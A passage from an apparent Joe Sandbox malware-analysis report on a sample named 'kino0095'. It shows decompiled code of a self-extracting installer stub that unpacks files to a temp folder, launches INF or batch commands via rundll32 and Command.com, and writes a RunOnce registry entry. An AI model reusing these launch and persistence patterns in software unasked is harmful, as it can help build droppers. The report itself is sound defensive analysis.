									_t140 = "]";
									E00301A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E003044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x309120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x301140, _t156, 8,  &_v268) == 0) {
										 *0x309a34 =  *0x309a34 & 0xfffffffb;
										if( *0x309a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0030171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x309a34 =  *0x309a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00301680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00301680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00306CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00301af3
0x00301afa
0x00301b07
0x00301b09
0x00301b1a
0x00301b20
0x00301b2c
0x00301b3b
0x00301b40
0x00301b2e
0x00301b2e
0x00301b33
0x00301b33
0x00301b46
0x00301b4c
0x00301b52
0x00301b57
0x00301b5d
0x00301b61
0x00301b9f
0x00301b9f
0x00301bb1
0x00301bc2
0x00000000
0x00301b63
0x00301b63
0x00301b65
0x00301b68
0x00301b68
0x00301b6a
0x00301b6b
0x00301b6f
0x00301b74
0x00000000
0x00000000
0x00301b76
0x00301b7b
0x00301b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00301b8c
0x00301b8c
0x00301b98
0x00301bc7
0x00301bc9
0x00301bcc
0x00301bd3
0x00301d75
0x00301d76
0x00301d78
0x00301d7f
0x00301e05
0x00301e09
0x00000000
0x00000000
0x00301e12
0x00301e1b
0x00301e73
0x00301e21
0x00301e21
0x00301e28
0x00301e37
0x00301e3e
0x00301e52
0x00301e60
0x00301e60
0x00301e3e
0x00301e79
0x00301e7b
0x00301e84
0x00000000
0x00301d9b
0x00301d9b
0x00301da0
0x00301da2
0x00301da5
0x00301da5
0x00301da7
0x00301da8
0x00301dac
0x00301dae
0x00301db4
0x00301db7
0x00301db7
0x00301db9
0x00301dba
0x00301dbe
0x00301dc3
0x00301dce
0x00301dd2
0x00301deb
0x00000000
0x00301df0
0x00000000
0x00301dd2
0x00301bf7
0x00301bfe
0x00301c07
0x00301d55
0x00301d5a
0x00301d5b
0x00301d5d
0x00301d5e
0x00000000
0x00301c1b
0x00301c1b
0x00301c20
0x00301c2c
0x00301c33
0x00301c38
0x00301c3a
0x00301c3a
0x00301c40
0x00301c4b
0x00301c4b
0x00301c5d
0x00301c61
0x00301dd4
0x00301dd4
0x00301dd6
0x00301ddb
0x00301ddc
0x00301dde
0x00301d64
0x00301d64
0x00301d67
0x00301d6c
0x00000000
0x00301c67
0x00301c67
0x00301c6d
0x00301c72
0x00301c74
0x00301c74
0x00301c8e
0x00301c99
0x00301cc0
0x00301cf8
0x00301d07
0x00301d23
0x00301d09
0x00301d14
0x00301d1b
0x00301d1b
0x00301d2b
0x00301d2d
0x00301d2d
0x00301d38
0x00301d39
0x00301d46
0x00301cc2
0x00301cc2
0x00301ccc
0x00301cce
0x00301cce
0x00301cdb
0x00301ce6
0x00301cee
0x00301cee
0x00301e89
0x00301e91
0x00301e92
0x00301e94
0x00301e97
0x00301ea4
0x00301ea4
0x00301c61
0x00301c07
0x00301bd3
0x00301b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00301BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00301BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00301C57
GetPrivateProfileIntA.KERNEL32 ref: 00301C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00301140,00000000,00000008,?), ref: 00301CB8
GetShortPathNameA.KERNEL32 ref: 00301D1B

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Strings

rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00301D3B
", xrefs: 00301B25
.INF, xrefs: 00301BDB
Version, xrefs: 00301CB3
.BAT, xrefs: 00301D83
setupx.dll, xrefs: 00301D14
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00301BA0
Reboot, xrefs: 00301C82
Command.com /c %s, xrefs: 00301D9B, 00301DE8
DefaultInstall, xrefs: 00301C74, 00301C87, 00301CCE, 00301CD3, 00301D2D, 00301D39
setupapi.dll, xrefs: 00301D23, 00301D3A
AdvancedINF, xrefs: 00301CAE

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-819679500
Opcode ID: 25bd1399c797965101b0e9bc2a90348f59437a130915dc266f1eb4390e585d3a
Instruction ID: c17d46e518792bd2ba6537a8b351f78b3956a0035d0b7e5b3694741386cf8981
Opcode Fuzzy Hash: 25bd1399c797965101b0e9bc2a90348f59437a130915dc266f1eb4390e585d3a
Instruction Fuzzy Hash: A9A17870A032086BEB27DB24CC75FFA776DAB45310F144295F995A72C1DBB08E85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00302F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00302F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x308004; // 0xcd371c79
				_v8 = _t9 ^ _t46;
				if( *0x308a38 != 0) {
					L5:
					_t11 = E00305164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00306CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E003055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0030658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x30a288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x308a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x308a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x308d48 & 0x000000c0;
									if(( *0x308d48 & 0x000000c0) == 0) {
										_t41 =  *0x309a40; // 0x3, executed
										_t26 = E0030256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x308a24; // 0x0
									 *0x309a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x308a38;
										if( *0x308a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00304169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x309a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00303BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x308a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00303B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E003044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x309124 = E00306285();
							goto L16;
						}
						_t59 =  *0x309a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0030621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x308a24;
				if( *0x308a24 != 0) {
					L4:
					_t34 = E00303A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E003051E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x308a38;
				if( *0x308a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00302f1d
0x00302f28
0x00302f2f
0x00302f3d
0x00302f6c
0x00302f6c
0x00302f71
0x00302f73
0x00303041
0x00303041
0x00303043
0x00303053
0x00303053
0x00302f79
0x00302f80
0x00000000
0x00302f86
0x00302f86
0x00302f93
0x00302f9e
0x00302fa0
0x00302fa6
0x00302fb8
0x00302fba
0x00302fbe
0x00302fc6
0x00302fcc
0x00302fd4
0x00302fd6
0x00302fd8
0x00302fe0
0x00302fe6
0x00302fee
0x00302ff0
0x00302ff5
0x00302ff5
0x00302fee
0x00302fd4
0x00302ff8
0x00302ffe
0x00303004
0x00303017
0x0030301c
0x00303024
0x00303054
0x0030305a
0x00303065
0x00303065
0x0030306c
0x0030306e
0x00303075
0x0030307a
0x0030307a
0x0030307c
0x00303081
0x00303087
0x00303089
0x003030a1
0x003030a1
0x003030a9
0x003030ab
0x003030ad
0x003030af
0x003030af
0x003030ad
0x003030b6
0x00000000
0x0030308b
0x0030308b
0x00303091
0x00000000
0x00000000
0x00303093
0x00303098
0x0030309a
0x00000000
0x00000000
0x0030309c
0x00000000
0x0030309c
0x00303089
0x0030305c
0x00303061
0x00303063
0x00000000
0x00000000
0x00000000
0x00303063
0x0030302b
0x00303032
0x0030303c
0x00000000
0x0030303c
0x00303006
0x0030300c
0x00000000
0x00000000
0x0030300e
0x00303015
0x00000000
0x00000000
0x00000000
0x00303015
0x00302f80
0x00302f3f
0x00302f46
0x00302f5f
0x00302f5f
0x00302f64
0x00302f66
0x00000000
0x00000000
0x00000000
0x00302f66
0x00302f4f
0x00000000
0x00000000
0x00302f55
0x00302f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00302F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00302FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00302FC6
DecryptFileA.ADVAPI32 ref: 00302FE6
FreeLibrary.KERNEL32(00000000), ref: 00302FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0030301C

Part of subcall function 003051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00302F4D,?,00000002,00000000), ref: 00305201

Strings

advapi32.dll, xrefs: 00302F99
DecryptFileA, xrefs: 00302FC0
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00302FDB, 00303017

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3023407756
Opcode ID: 3d95804c37a12b27101ab8470147adef7caa91e30da399a286dc81b1176b1cd1
Instruction ID: d47b70cde69de2ee8d001888609224b0cef656fd91cebf9a70e6b9672c149751
Opcode Fuzzy Hash: 3d95804c37a12b27101ab8470147adef7caa91e30da399a286dc81b1176b1cd1
Instruction Fuzzy Hash: 6B41C270B036058BDB37AB35AC7976B73AC9B44750F010027E942C69D2EB74CE80CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00302390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00302390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x308004; // 0xcd371c79
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00306CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00301680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E003016B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00301680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E003016B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E003016B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0030658A( &_v280, 0x104, 0x301140);
								E00302390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00302398
0x0030239e
0x003023a3
0x003023a5
0x003023ae
0x003023b3
0x003024cb
0x003024d2
0x003024d3
0x003024d4
0x003024df
0x003023c2
0x003023d1
0x003023db
0x003023e4
0x003023f6
0x003023fc
0x00302401
0x00000000
0x00000000
0x00000000
0x00000000
0x00302407
0x00302407
0x00302408
0x00302411
0x0030241f
0x0030247a
0x00302483
0x00302495
0x003024a3
0x00302421
0x0030242f
0x00302453
0x0030245d
0x00302466
0x00302472
0x00302472
0x0030242f
0x003024af
0x003024b5
0x003024be
0x003024c5
0x00000000
0x003024c5

APIs

FindFirstFileA.KERNELBASE(?,00308A3A,003011F4,00308A3A,00000000,?,?), ref: 003023F6
lstrcmpA.KERNEL32(?,003011F8), ref: 00302427
lstrcmpA.KERNEL32(?,003011FC), ref: 0030243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00302495
DeleteFileA.KERNEL32(?), ref: 003024A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 003024AF
FindClose.KERNELBASE(00000000), ref: 003024BE
RemoveDirectoryA.KERNELBASE(00308A3A), ref: 003024C5

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 15bd994047ffe86660023b99a38d0580017658ab09a6bb2fd2bd2452847c1e79
Instruction ID: ff1b45fd0bfff8f0676db00045cdf38d712fdb6ac305965e8658ab08735edf2d
Opcode Fuzzy Hash: 15bd994047ffe86660023b99a38d0580017658ab09a6bb2fd2bd2452847c1e79
Instruction Fuzzy Hash: 7831B5316067449BC327DB64DCAEAEB73ACAFC4305F04492EF555862D0EB74990DC752

Uniqueness

Uniqueness Score: -1.00%

Function 00302BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00302BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x30a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x309124 = 0;
				if(E00302CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00302F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E003052B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x308a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x309a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00301F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x308588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x309124; // 0x80070002
				return _t7;
			}

0x00302c03
0x00302c0d
0x00302c18
0x00302c20
0x00302c2e
0x00302c32
0x00302c36
0x00302c3d
0x00302c43
0x00302c45
0x00302c47
0x00302c49
0x00302c4e
0x00302c4e
0x00302c47
0x00302c32
0x00302c20
0x00302c50
0x00302c54
0x00302c57
0x00302c64
0x00302c66
0x00302c6b
0x00302c6d
0x00302c74
0x00302c76
0x00302c7c
0x00302c7e
0x00302c87
0x00302c89
0x00302c89
0x00302c87
0x00302c7c
0x00302c74
0x00302c8e
0x00302c95
0x00302c98
0x00302c98
0x00302c9e
0x00302ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00306BB0,00300000,00000000,00000002,0000000A), ref: 00302C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00306BB0,00300000,00000000,00000002,0000000A), ref: 00302C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00302C28
CloseHandle.KERNEL32(00000000,?,?,00306BB0,00300000,00000000,00000002,0000000A), ref: 00302C98

Strings

HeapSetInformation, xrefs: 00302C22
Kernel32.dll, xrefs: 00302C13

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: feae5c21540037d1d933a744fdfbacd09237d64eb4dda845528380bc86497735
Instruction ID: b8b4b177188aa104311b21a14e5f9772539adca6d7c2d1d9fa0df33089c8a7dc
Opcode Fuzzy Hash: feae5c21540037d1d933a744fdfbacd09237d64eb4dda845528380bc86497735
Instruction Fuzzy Hash: DD11AC31203716ABE723ABB5ACBCA6F376D9B88390F060426F940E72D1DA20DC418765

Uniqueness

Uniqueness Score: -1.00%

Function 00306F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00306F40() {

				SetUnhandledExceptionFilter(E00306EF0); // executed
				return 0;
			}

0x00306f45
0x00306f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00306F45

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 514efcf849b619c888dbe5307393193bdd8b7fd14252c536258e4a334b231bb8
Instruction ID: f68b19682cb30b37dbd7ffad84e2c07827e15293d48fab9b3012d39be2ab62d7
Opcode Fuzzy Hash: 514efcf849b619c888dbe5307393193bdd8b7fd14252c536258e4a334b231bb8
Instruction Fuzzy Hash: 4490027425370047D6161B70EE3A45A75A95B4D743F815461E011C44D9DB6040509552

Uniqueness

Uniqueness Score: -1.00%

Function 0030202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0030202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x308004; // 0xcd371c79
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00306CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0030171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0030658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x309a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x3091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x3091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3091e5);
						if(_t90 != 0) {
							 *0x308580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
							E0030171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E003044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0030658A( &_v268, 0x104, 0x301140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x308530 = _t66;
				goto L23;
			}

0x0030202a
0x00302035
0x0030203c
0x00302041
0x00302050
0x0030205f
0x00302064
0x0030206f
0x0030208c
0x00302094
0x00302257
0x00302266
0x00302266
0x0030209a
0x0030209b
0x0030209d
0x003020aa
0x003020af
0x003020c9
0x003020d1
0x00000000
0x00000000
0x003020d3
0x003020da
0x00000000
0x00000000
0x00000000
0x003020da
0x003020e2
0x00302103
0x0030210e
0x00302116
0x00302122
0x00302128
0x0030212c
0x00302179
0x00302194
0x003021de
0x003021e4
0x00302256
0x00302256
0x00000000
0x00302256
0x00302196
0x00302196
0x0030219c
0x0030219f
0x0030219f
0x003021a1
0x003021a2
0x003021a6
0x003021a8
0x003021b0
0x003021b0
0x003021b2
0x003021b3
0x003021bc
0x003021c7
0x003021cb
0x003021f1
0x003021f6
0x003021fd
0x003021ff
0x003021ff
0x00302204
0x00302213
0x00302218
0x0030221d
0x0030221d
0x00302220
0x00302220
0x00302222
0x00302223
0x00302229
0x0030223d
0x00302249
0x00302250
0x00000000
0x00302250
0x003021d2
0x003021d9
0x00000000
0x003021d9
0x0030213a
0x00302141
0x00302144
0x0030214c
0x00000000
0x00000000
0x00302163
0x00302172
0x00302172
0x00000000
0x00302163
0x003020ea
0x003020f0
0x00000000

APIs

memset.MSVCRT ref: 00302050
memset.MSVCRT ref: 0030205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0030208C

Part of subcall function 0030171E: _vsnprintf.MSVCRT ref: 00301750

